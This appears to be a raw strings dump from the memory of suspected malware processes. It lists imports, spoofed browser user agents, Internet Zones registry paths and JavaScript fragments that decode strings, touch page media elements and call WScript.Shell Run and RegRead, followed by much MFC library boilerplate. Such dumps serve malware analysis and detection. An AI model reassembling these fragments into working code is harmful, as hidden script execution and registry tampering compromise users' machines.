USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
4,41494^4
6%6X6v6
6*636@6~6
>0>>>[>~>
6%6s6
67
7%7X7
3%4,41464
6-676H6l6v6}6
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
hwopt12052016001648_updater_service.exe_380_rwx_00A40000_0000C000:
o%Cyj
W%Cyj!
?%Cyj"
'%Cyj#
%Cyj$
regsvr32.exe_2952:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
6*636@6~6
6*636@6~6
>0>>>[>~>
>0>>>[>~>
6%6s6
6%6s6
67
67
7%7X7
7%7X7
3%4,41464
3%4,41464
6-676H6l6v6}6
6-676H6l6v6}6
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_2952_rwx_00080000_00132000:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
4,41494^4
6%6X6v6
6*636@6~6
>0>>>[>~>
6%6s6
67
7%7X7
3%4,41464
6-676H6l6v6}6
Uh.EE
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
master.exe_1488:
.text
`.rdata
@.data
.rsrc
@.reloc
actualKey
J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI
j.hHZg
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl
CACHE_S_FORMATETC_NOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
OLE_E_ADVISENOTSUPPORTED
REGDB_E_KEYMISSING
CACHE_E_FIRST...CACHE_E_LAST
CACHE_S_FIRST...CACHE_S_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CO_E_FIRST...CO_E_LAST
CO_S_FIRST...CO_S_LAST
DATA_E_FIRST...DATA_E_LAST
DATA_S_FIRST...DATA_S_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
ENUM_E_FIRST...ENUM_E_LAST
ENUM_S_FIRST...ENUM_S_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MK_E_FIRST...MK_E_LAST
MK_S_FIRST...MK_S_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLE_E_FIRST...OLE_E_LAST
OLE_S_FIRST...OLE_S_LAST
REGDB_E_FIRST...REGDB_E_LAST
REGDB_S_FIRST...REGDB_S_LAST
VIEW_E_FIRST...VIEW_E_LAST
VIEW_S_FIRST...VIEW_S_LAST
FACILITY_WINDOWS
severity: %s, facility: %s ($lX)
range: %s ($lX)
%s ($lX)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
Warning: constructing COleException, scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h
CNotSupportedException
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp
KERNEL32.DLL
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
%s (%s:%d)
lX-X-x-XX-XXXXXX
m_msgCur = {
m_pszExeName =
m_nCmdShow =
m_lpCmdLine =
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp
RegCreateKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
IGNORING command id 0xX sent to %hs dialog.
Routing command id 0xX to app.
Routing command id 0xX to owner window.
Warning: Creating dialog from within a COleControlModule application is not a supported scenario.
Warning: ExecuteDlgInit failed during dialog init.
ERROR: Dialog with IDD 0xX must have the child style.
ERROR: Dialog named '%s' must have the child style.
ERROR: Dialog with IDD 0xX must be invisible.
ERROR: Dialog named '%s' must be invisible.
ERROR: Cannot find dialog template with IDD 0xX.
ERROR: Cannot find dialog template named '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
Warning: unknown WM_MEASUREITEM for menu item 0xX.
Can't register window class named %s
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
user32.dll
WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
Implementation Warning: control notification = $%X.
Warning: not executing disabled command %d
hWnd = $X (nIDC=$X) is not a %hs.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdlgs.inl
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp
SENDING control notification %d from control id 0xX to %hs window.
SENDING command id 0xX to %hs target.
No handler for command ID 0xX, disabling it.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp
m_nMsgLast =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp
MRU: open file (%d) '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp
Error: failed to load message box prompt string 0xx.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Error: no data exchange control with ID 0xX.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
Warning: dialog data checkbox value (%d) out of range.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
m_ps.rcPaint =
m_ps.fErase =
m_ps.hdc =
lgpn.lopnColor =
lgpn.lopnWidth.x (width) =
lgpn.lopnStyle =
lb.lbColor =
lb.lbHatch =
lb.lbStyle =
lf.lfFaceName =
lf.lfPitchAndFamily =
lf.lfQuality =
lf.lfClipPrecision =
lf.lfOutPrecision =
lf.lfCharSet =
lf.lfStrikeOut =
lf.lfUnderline =
lf.lfItalic =
lf.lfWeight =
lf.lfOrientation =
lf.lfEscapement =
lf.lfWidth =
lf.lfHeight =
bm.bmBitsPixel =
bm.bmPlanes =
bm.bmWidthBytes =
bm.bmWidth =
bm.bmHeight =
bm.bmType =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\objcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olevar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcex.cpp
CLSID\%s
Interface\%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
mfcm100d.dll
QueryInterface(%s) failed
QueryInterface(%s) succeeded
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appinit.cpp
AppMsg
WinMsg
CmdRouting
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecnvrt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrmx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
Warning: Shrinking safety pool from %d to %d to satisfy request of %d bytes.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdatarecovery.cpp
lXXxXXXXXXXX
RegDeleteKeyExA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobals.cpp
%s:%x:%x:%x:%x
Shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpcont.cpp
0xx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occevent.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp
IOleInPlaceObject not supported on OLE control (dialog ID %d).
Persistence not supported on OLE control %ls.
%d. Column ordinal %d: Binding as native data type
%d. Column ordinal %d: Binding a COM object
F%d. Column ordinal %d: Binding as an IStream object
%d. Column ordinal %d: Binding as an ISequentialStream object
neither ISequentialStream nor IStream are supported!
IStream is supported
FISequentialStream is supported
Testing streams support...
%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory
%d. Column ordinal %d: Binding length and status ONLY
Number of columns: %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h
Dw=Binding entry %d failed. Status: %d
Unsupported DBTYPE (%d) in column %d
$@Column %d not bound
GetData failed - HRESULT = 0x%X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filemem.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\plex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgtempl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxctrlcontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbasepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbar.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxvisualmanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcontrolbarutil.h
%sMFCToolBar-%d%x
%sMFCToolBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsettingsstore.h
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenu.cpp
&%d %s
Can't import menu
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin4.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpopupmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertoolsmanager.cpp
Too many user-defined tools. The max. number is %d
WM_HOTKEY
WM_SETHOTKEY
WM_IDLEUPDATECMDUI
WM_DDE_EXECUTE
WM_KEYLAST
WM_SYSKEYUP
WM_SYSKEYDOWN
WM_KEYUP
WM_KEYDOWN
WM_VKEYTOITEM
WM_CTLCOLORMSGBOX
%s: hwnd=0xX, msg = 0xX (0xX, 0xX)
%s: hwnd=0xX, msg = %hs (0xX, 0xX)
WM_USER 0xX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrace.cpp
%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d
%s: Execute '%s'.
Warning: Unable to unpack WM_DDE_EXECUTE lParam lX.
Warning: failed to reclaim %d bytes for memory safety pool.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winhand.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_pp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filex.cpp
CFile exception: %hs, File %s, OS error information = %ld.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcobj.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_w.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_d.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_u.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_o.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_wo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_sp.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_so.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\map_ss.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcomm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfile.cpp
m_ofn.lpstrCustomFilter =
m_ofn.lpstrFilter =
m_ofn.nFileExtension =
m_ofn.nFileOffset =
m_ofn.lpstrDefExt =
m_ofn.Flags =
m_ofn.lpstrTitle =
m_ofn.nMaxFileTitle =
m_ofn.lpstrFileTitle =
m_ofn.nMaxFile =
m_ofn.lpstrFile =
m_ofn.nFilterIndex =
m_ofn.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprop.cpp
m_psp.dwFlags =
PropertySheet() failed: GetLastError returned %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\barcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bartool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
Warning: could not get volume information '%s'.
Warning: could not parse the path '%s'. Path is too long.
Warning: could not parse the path '%s'.
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Error: failed to execute DDE command '%s'.
Warning: DDE command '%s' ignored because window is disabled.
Warning: no message line prompt for ID 0xX.
Warning: OnUpdateKeyIndicator - unknown indicator 0xX.
Warning: scroll bars in frame windows may cause unusual behaviour.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledisp2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_p.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleenum.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelp.cpp
Error: failed to load AfxFormatString string 0xx.
Error: illegal string index requested %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdix.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\arcstrm.cpp
ole32.dll
ole32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
CRegKey::RecurseDeleteKey : Failed to Open Key %s(Error = %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\doccore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filest.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingmanager.cpp
%sDockingManager-%d
%sDockingManager-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuimages.cpp
CMenuImages. Can't load menu images %x
CMenuImages. Can't load menu images %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxvisualmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxkeyboardmanager.cpp
KeyboardManager
KeyboardManager
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenuhash.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpaneframewnd.cpp
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdichildwndex.cpp
Setting of tab order failed, error code: %x
Setting of tab order failed, error code: %x
Registration of tab failed, error code: %x
Registration of tab failed, error code: %x
Creation of tab proxy window failed, error code: %d
Creation of tab proxy window failed, error code: %d
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
CMDIChildWndEx::SetTaskbarTabProperties failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmdiframewndex.h
SetTaskbarThumbnailClipRect failed with code %x.
SetTaskbarThumbnailClipRect failed with code %x.
pfnSetIconicThumbnail failed with code %x
pfnSetIconicThumbnail failed with code %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoledocipframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxframeimpl.h
